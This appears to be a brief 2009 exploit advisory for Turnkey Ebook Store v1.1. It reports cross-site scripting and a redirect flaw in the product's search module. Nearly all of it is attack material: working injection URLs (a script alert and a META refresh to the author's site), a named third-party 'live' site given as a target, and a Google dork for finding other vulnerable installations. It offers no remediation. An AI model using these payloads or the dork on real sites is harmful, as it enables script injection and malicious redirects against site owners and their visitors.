Turnkey Ebook Store v1.1 - Cross site Scripting and Redirect 
  
Link: http://www.privatelabelresellrights-store.com/ebookstore/

- 31-03-2009 

- Methodman - http://nemesis.te-home.net 


- Vulnerability was found on search module. 

example: 

- http://site.com/index.php?cmd=search&keywords="><script>alert('XSS')</script>  
 
- http://site.com/index.php?cmd=search&keywords=<META HTTP-EQUIV="refresh" content="0; URL=http://nemesis.te-home.net">
 
live: 

- http://1dollar-ebookstore.com/index.php?cmd=search&keywords="><script>alert('XSS')</script> 


Google dork: - Powered by Turnkey Ebook Store v1.1 


/teamelite